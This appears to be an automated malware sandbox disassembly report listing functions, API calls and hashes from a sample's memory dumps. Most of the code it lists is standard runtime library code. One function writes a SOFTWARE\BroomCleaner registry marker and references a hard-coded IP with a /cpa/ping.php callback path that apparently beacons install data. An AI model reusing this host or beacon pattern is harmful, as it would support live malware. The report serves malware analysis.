_ValidateLocalCookies.LIBCMT ref: 0040A811

Strings

csm, xrefs: 0040A7A6

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 1170836740-1018135373
Opcode ID: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction ID: 23505c37bb0df54e9d772fc2403dd448dd449399a7c5e18b9979e78af1eb181c
Opcode Fuzzy Hash: 9c4d965ac64c68ad1acf27fcd63e115faa6e970b3dad7dcbeead64b99ae0827c
Instruction Fuzzy Hash: B7415274E003089BCB10DF69C884A9EBBB5AF45318F14C17BE8156B3D2D739D925CB96

Uniqueness

Uniqueness Score: -1.00%

Function 031763C1 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85registryCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 031763C6
RegCreateKeyExA.ADVAPI32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 031763EE
RegSetValueExA.ADVAPI32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 03176471
RegCloseKey.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 03176492

Strings

Installed, xrefs: 031763D0, 031763FE, 0317641D, 0317641E
SOFTWARE\BroomCleaner, xrefs: 031763CE, 031763E1

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction ID: fcf5cdadd6bf83b6dd65749572cd10d6a230638c1ab8ad02802e17609639583c
Opcode Fuzzy Hash: 0b1f03838103bc79192dd29aecd11cdb4eee571ac517255c8300f4294fb95730
Instruction Fuzzy Hash: FB315872A00219EFDB15DFA8C890AFEBB79EB49214F08456DE90277251D7711D06CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 004227A8 Relevance: 10.6, APIs: 7, Instructions: 80COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction ID: e24961ea6169977100e6de332b8cae97d730c3ba4f888c233ff9c32580c66a3b
Opcode Fuzzy Hash: 81ada43cddaa793191611bc99ca2e9e8f2b927b510fc63ccdaad96e19ac5d437
Instruction Fuzzy Hash: 1611E7726081297BDB203F739D059AB3A6CDF92764B51062AFC15D7251DABCC84282B9

Uniqueness

Uniqueness Score: -1.00%

Function 0316F513 Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0316F25A: _free.LIBCMT ref: 0316F283

_free.LIBCMT ref: 0316F561

Part of subcall function 03166501: HeapFree.KERNEL32(00000000,00000000,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?), ref: 03166517
Part of subcall function 03166501: GetLastError.KERNEL32(?,?,0316F288,?,00000000,?,00000000,?,0316F52C,?,00000007,?,?,0316F920,?,?), ref: 03166529

_free.LIBCMT ref: 0316F56C
_free.LIBCMT ref: 0316F577
_free.LIBCMT ref: 0316F5CB
_free.LIBCMT ref: 0316F5D6
_free.LIBCMT ref: 0316F5E1
_free.LIBCMT ref: 0316F5EC

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: 7647c34cbcdeef1c6378708a1008d984ec484acef91f13c81e87325111c09f10
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 2A110A7A544B04ABDA30FBF0DC4BFCB7B9DAF4C700F404819A69BAA050DB65E5258E61

Uniqueness

Uniqueness Score: -1.00%

Function 0041F2AC Relevance: 10.6, APIs: 7, Instructions: 65COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0041EFF3: _free.LIBCMT ref: 0041F01C

_free.LIBCMT ref: 0041F2FA

Part of subcall function 0041629A: RtlFreeHeap.NTDLL(00000000,00000000,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?), ref: 004162B0
Part of subcall function 0041629A: GetLastError.KERNEL32(?,?,0041F021,?,00000000,?,00000000,?,0041F2C5,?,00000007,?,?,0041F6B9,?,?), ref: 004162C2

_free.LIBCMT ref: 0041F305
_free.LIBCMT ref: 0041F310
_free.LIBCMT ref: 0041F364
_free.LIBCMT ref: 0041F36F
_free.LIBCMT ref: 0041F37A
_free.LIBCMT ref: 0041F385

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction ID: be7813cec9e76b844f682d4c097dbd82c10abeb52ecb146189267b1763b940f2
Opcode Fuzzy Hash: 501a0837026fe0814ab2d6a77f43a53b196c1575d4fb2c1b0167c2d280276289
Instruction Fuzzy Hash: 1F114272541B24B6D920BB72DC07FCBB7DCBF44708F40081EBE9E66052DA7DB5868654

Uniqueness

Uniqueness Score: -1.00%

Function 031543F0 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 031543F5
std::_Lockit::_Lockit.LIBCPMT ref: 03154404
int.LIBCPMT ref: 0315441B

Part of subcall function 0315157F: std::_Lockit::_Lockit.LIBCPMT ref: 03151590
Part of subcall function 0315157F: std::_Lockit::~_Lockit.LIBCPMT ref: 031515AA

std::locale::_Getfacet.LIBCPMT ref: 03154424
std::_Facet_Register.LIBCPMT ref: 03154455
std::_Lockit::~_Lockit.LIBCPMT ref: 0315446B
__CxxThrowException@8.LIBVCRUNTIME ref: 03154491

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction ID: c458f137adc01ab73d2f77306ba474d2f307cb149225c3d234ef68ccc34ec42c
Opcode Fuzzy Hash: e4831a17e9389af87c191ca157e46dd7d187b50277cf216024756019587e60ea
Instruction Fuzzy Hash: D611BF36940228DBCB05EBA4DC05AEEB774EF88214F15452AFC35AB290DF749A41CBE0

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 7f04bc736b480ee01d3eae57bcb919a2b9243a76784e8c0ad09bcb8f93a2b6a7
Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
Opcode Fuzzy Hash: 7f04bc736b480ee01d3eae57bcb919a2b9243a76784e8c0ad09bcb8f93a2b6a7
Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 0315385C Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 03153861
std::_Lockit::_Lockit.LIBCPMT ref: 03153870
int.LIBCPMT ref: 03153887

Part of subcall function 0315157F: std::_Lockit::_Lockit.LIBCPMT ref: 03151590
Part of subcall function 0315157F: std::_Lockit::~_Lockit.LIBCPMT ref: 031515AA

std::locale::_Getfacet.LIBCPMT ref: 03153890
std::_Facet_Register.LIBCPMT ref: 031538C1
std::_Lockit::~_Lockit.LIBCPMT ref: 031538D7
__CxxThrowException@8.LIBVCRUNTIME ref: 031538FD

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction ID: 3bfb0660c741bee3e494baaa1d8508be295169d4108a955cb35dbe8f5f81835f
Opcode Fuzzy Hash: 01699667aa2a77937d9adaa910a4886983fe4db3813f95f217182bdb03a19c45
Instruction Fuzzy Hash: 1D11947AD00214DBCB05EBA4C804BEEB775EF4C650F19496AFD31AB290DB749A04C790

Uniqueness

Uniqueness Score: -1.00%

Function 03153651 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 03153656
std::_Lockit::_Lockit.LIBCPMT ref: 03153665
int.LIBCPMT ref: 0315367C

Part of subcall function 0315157F: std::_Lockit::_Lockit.LIBCPMT ref: 03151590
Part of subcall function 0315157F: std::_Lockit::~_Lockit.LIBCPMT ref: 031515AA

std::locale::_Getfacet.LIBCPMT ref: 03153685
std::_Facet_Register.LIBCPMT ref: 031536B6
std::_Lockit::~_Lockit.LIBCPMT ref: 031536CC
__CxxThrowException@8.LIBVCRUNTIME ref: 031536F2

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction ID: 130059a00f78ee6e540662a0af7387e912f07afa10ee8b9a8338ac8b2c4eedfd
Opcode Fuzzy Hash: d912247cf65187564cb857c5a435760ff66a759f63cb392730071c1b62a8ae47
Instruction Fuzzy Hash: E611917AD00228EBCB05EBA4C814BEEB775EF48250F14096AFC35AB2D0DB749A04C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 004033EA Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004033EF
std::_Lockit::_Lockit.LIBCPMT ref: 004033FE
int.LIBCPMT ref: 00403415

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 0040341E
std::_Facet_Register.LIBCPMT ref: 0040344F
std::_Lockit::~_Lockit.LIBCPMT ref: 00403465
__CxxThrowException@8.LIBVCRUNTIME ref: 0040348B

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 731508520368e75c7ea612f84dcea702521109302910a029de8bbf3d5de5a9a9
Instruction ID: cdc69c2a9e90ba919e1258be772e803faed7ee3eebec81448dba6679bc4cf361
Opcode Fuzzy Hash: 731508520368e75c7ea612f84dcea702521109302910a029de8bbf3d5de5a9a9
Instruction Fuzzy Hash: 8E11BF329001289BCB05EFA4C815AEE7B78EF84319F10452EE911BB2D1DB789A04CB99

Uniqueness

Uniqueness Score: -1.00%

Function 004035F5 Relevance: 10.6, APIs: 7, Instructions: 57COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004035FA
std::_Lockit::_Lockit.LIBCPMT ref: 00403609
int.LIBCPMT ref: 00403620

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 00403629
std::_Facet_Register.LIBCPMT ref: 0040365A
std::_Lockit::~_Lockit.LIBCPMT ref: 00403670
__CxxThrowException@8.LIBVCRUNTIME ref: 00403696

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 984f4820562becabbcd105a461c6a574276ccd078b5a22ee02043e0cc13f7d8e
Instruction ID: 76a64bb1f13388b8652502aa8a079a3a0bf37f657045f8e793a704159d5c315e
Opcode Fuzzy Hash: 984f4820562becabbcd105a461c6a574276ccd078b5a22ee02043e0cc13f7d8e
Instruction Fuzzy Hash: FA119032900124ABCB14EF65C805AEE7B74AF48319F10456FE911B73D1DB389A04C799

Uniqueness

Uniqueness Score: -1.00%

Function 03177D27 Relevance: 9.3, APIs: 6, Instructions: 276COMMON

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 03177E37
__FindPESection.LIBCMT ref: 03177E51

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 305ed28475dc465b79ac3dfaae3b5c9eab7b5dcf352450e3ecf850036386321e
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 98A18C72A00655CBCB25CF68C984ABEB7B5EB0C310F2D4269D815EB391DB35ED41CBA4

Uniqueness

Uniqueness Score: -1.00%

Function 00427AC0 Relevance: 9.3, APIs: 6, Instructions: 276COMMONLIBRARYCODE

Download Yara Rule

APIs

_ValidateScopeTableHandlers.LIBCMT ref: 00427BD0
__FindPESection.LIBCMT ref: 00427BEA

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: FindHandlersScopeSectionTableValidate
String ID:
API String ID: 876702719-0
Opcode ID: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction ID: 52cd69d4b64803fa133344d4e9d29b6b42e74987d25fff38166c3f8cc652100c
Opcode Fuzzy Hash: bc384f76d8f635c5b2c6c749d7951069b59a0ece1133742fdae5e3cbfd5bbb72
Instruction Fuzzy Hash: 73A1D172B08225CFCB15CF69E9807AEB7B4EB44314F95466AD805EB351D739EC00CB98

Uniqueness

Uniqueness Score: -1.00%

Function 031669A6 Relevance: 9.2, APIs: 6, Instructions: 216COMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,?,?,?,?,?,03166BF7,00000001,00000001,?), ref: 03166A00
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,03166BF7,00000001,00000001,?,?,?,?), ref: 03166A86
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 03166B80
__freea.LIBCMT ref: 03166B8D

Part of subcall function 03167CAC: RtlAllocateHeap.NTDLL(00000000,00000000), ref: 03167CDE

__freea.LIBCMT ref: 03166B96
__freea.LIBCMT ref: 03166BBB

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction ID: fd2a703e11db90419050bf20de73c7f823911859457d5a6baf8d7b15b709832a
Opcode Fuzzy Hash: e585c11a09ad45e81fd8c7ab38732ec500fb5332ab6a3e035dec317634217569
Instruction Fuzzy Hash: AA519272710216EFDB25CFA4CC41EABB7AAEB49760F19466DFD05DB140DB34EC6086A0

Uniqueness

Uniqueness Score: -1.00%

Function 03161CD3 Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 03161CFF
__cftoe.LIBCMT ref: 03161D31

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction ID: 78afb9a7092774925b384f2e851452c8039e785f647f6e3213932bec2198dc10
Opcode Fuzzy Hash: 90da76973bb766ea4a315db8452379bb561b87577be5415ac3e43ae82e0a4dd4
Instruction Fuzzy Hash: 80512776900305BBDF25DBE98C44EAEB7ADEF4D364F18463AF814DA181DB31D5708AA0

Uniqueness

Uniqueness Score: -1.00%

Function 00411A6C Relevance: 9.2, APIs: 6, Instructions: 200COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftoe.LIBCMT ref: 00411A98
__cftoe.LIBCMT ref: 00411ACA

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: __cftoe
String ID:
API String ID: 4189289331-0
Opcode ID: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction ID: df7bbd6b43df22bb4be9fc1c410e64f9820c02350ec4393f10609d324cfe3ba4
Opcode Fuzzy Hash: 3abcaf1d833c0b43dbdf51c67ed2576d6ab8f65321eebda5ff6643d6b04ddf7b
Instruction Fuzzy Hash: 7551FD72904205ABDF209B699D41EEF77A99F48364F10011FFA15962A2EB3DDD80C65C

Uniqueness

Uniqueness Score: -1.00%

Function 0315CC22 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0315CC19,0315A4C2), ref: 0315CC30
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0315CC3E
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0315CC57
SetLastError.KERNEL32(00000000,?,0315CC19,0315A4C2), ref: 0315CCA9

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction ID: 599d0718d56569637e5da659c04e5cb409281f0a003d17b66ebeaaf576d5c892
Opcode Fuzzy Hash: 152d12fcc9b38d6eb509e9b18f925b7f1960da531015352f4daf10028e3799ab
Instruction Fuzzy Hash: 86012836249311DFE729EFB87D889672758EB09B72720023DF934841F0EF51482082C4

Uniqueness

Uniqueness Score: -1.00%

Function 0040C9BB Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040C9B2,0040A25B), ref: 0040C9C9
___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0040C9D7
___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0040C9F0
SetLastError.KERNEL32(00000000,?,0040C9B2,0040A25B), ref: 0040CA42

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLastValue___vcrt_
String ID:
API String ID: 3852720340-0
Opcode ID: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction ID: ee19b3e2510f7423959140ec21889b16034e20938e88c6190324d52fb0663b51
Opcode Fuzzy Hash: a89c5195120a82154cc37d67133d9963b678ac02c8548023733cd8c502b1c527
Instruction Fuzzy Hash: 8601F572649215AEE6395FB9BDC56572A54DB01338720033FF214B12F0EA794C16954C

Uniqueness

Uniqueness Score: -1.00%

Function 03166F80 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0315E697,?,?,?,0315ED94,?), ref: 03166F84
_free.LIBCMT ref: 03166FB7
_free.LIBCMT ref: 03166FDF
SetLastError.KERNEL32(00000000), ref: 03166FEC
SetLastError.KERNEL32(00000000), ref: 03166FF8
_abort.LIBCMT ref: 03166FFE

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: b85522fc53cd07a322269044c06a7b73ca1c287efd3c3493e4de6230c7985484
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: 3CF0F43A24870127D222E3F96C28B6B251D9BCD775F2904A4F825DA2D0EF218C324169

Uniqueness

Uniqueness Score: -1.00%

Function 00416D19 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,0040E430,?,?,?,0040EB2D,?), ref: 00416D1D
_free.LIBCMT ref: 00416D50
_free.LIBCMT ref: 00416D78
SetLastError.KERNEL32(00000000), ref: 00416D85
SetLastError.KERNEL32(00000000), ref: 00416D91
_abort.LIBCMT ref: 00416D97

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: ErrorLast$_free$_abort
String ID:
API String ID: 3160817290-0
Opcode ID: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction ID: dffb23d06d1e15ef1aad1c845134e5c8e8eacf90562cc3591d5b7c0101a08115
Opcode Fuzzy Hash: a2875e3ccb6b8632a006c07bc9f65a419aef02cbdef471612c5cc690c003f94f
Instruction Fuzzy Hash: BDF0F43178871026C2227B367C0ABDB26299FC1775F22052FF91D92291EF2CDCC2815D

Uniqueness

Uniqueness Score: -1.00%

Function 00417253 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,-@,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue), ref: 00417285
GetLastError.KERNEL32(?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000,00000364,?,00416DEB), ref: 00417291
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,004171FA,-@,00000000,00000000,00000000,?,004174B2,00000006,FlsSetValue,0042F340,FlsSetValue,00000000), ref: 0041729F

Strings

-@, xrefs: 0041727C

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_g77dRQ1Csm.jbxd

Similarity

API ID: LibraryLoad$ErrorLast
String ID: -@
API String ID: 3177248105-2564449678
Opcode ID: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction ID: 7e42d4c6809e44159ca8b586cb0097734ec1077dc4da662fe3f049ba49388dcf
Opcode Fuzzy Hash: 26bf22cc59954dcc6720876a51754d7684b8387ef23ad7c861cfe47f39fec3a2
Instruction Fuzzy Hash: 8B01F7367492279BC7314B699C44A977BB8AF55760B500671F909D7240DB34DC43C6E8

Uniqueness

Uniqueness Score: -1.00%

Function 03151AE6 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 03151B30
std::system_error::system_error.LIBCPMT ref: 03151B3F

Strings

ios_base::eofbit set, xrefs: 03151B07
ios_base::failbit set, xrefs: 03151B02, 03151B39
ios_base::badbit set, xrefs: 03151AF7, 03151B18

Memory Dump Source

Source File: 00000000.00000002.1899611037.0000000003150000.00000040.00001000.00020000.00000000.sdmp, Offset: 03150000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_3150000_g77dRQ1Csm.jbxd

Yara matches

Similarity

API ID: Exception@8Throwstd::system_error::system_error
String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
API String ID: 1589814233-1866435925
Opcode ID: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction ID: 4fbd6435bde049f06d443cefe4c8ce2049c96c4c8f56e11221566dc576ffe827
Opcode Fuzzy Hash: 2b3e5ca4bc1d127b2dba606601132dddbbf971fcac2ee0ac16a13b9037fe9581
Instruction Fuzzy Hash: EAF0F67590036DF7CF12EB908C40FD97BA89F0D690F15C436FD646A180E7B5594482E8

Uniqueness

Uniqueness Score: -1.00%

Function 0040187F Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 39COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

ios_base::failbit set, xrefs: 0040189B, 004018D2
ios_base::badbit set, xrefs: 00401890, 004018B1
ios_base::eofbit set, xrefs: 004018A0

Memory Dump Source

Source File: 00000000.00000002.1896876632.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

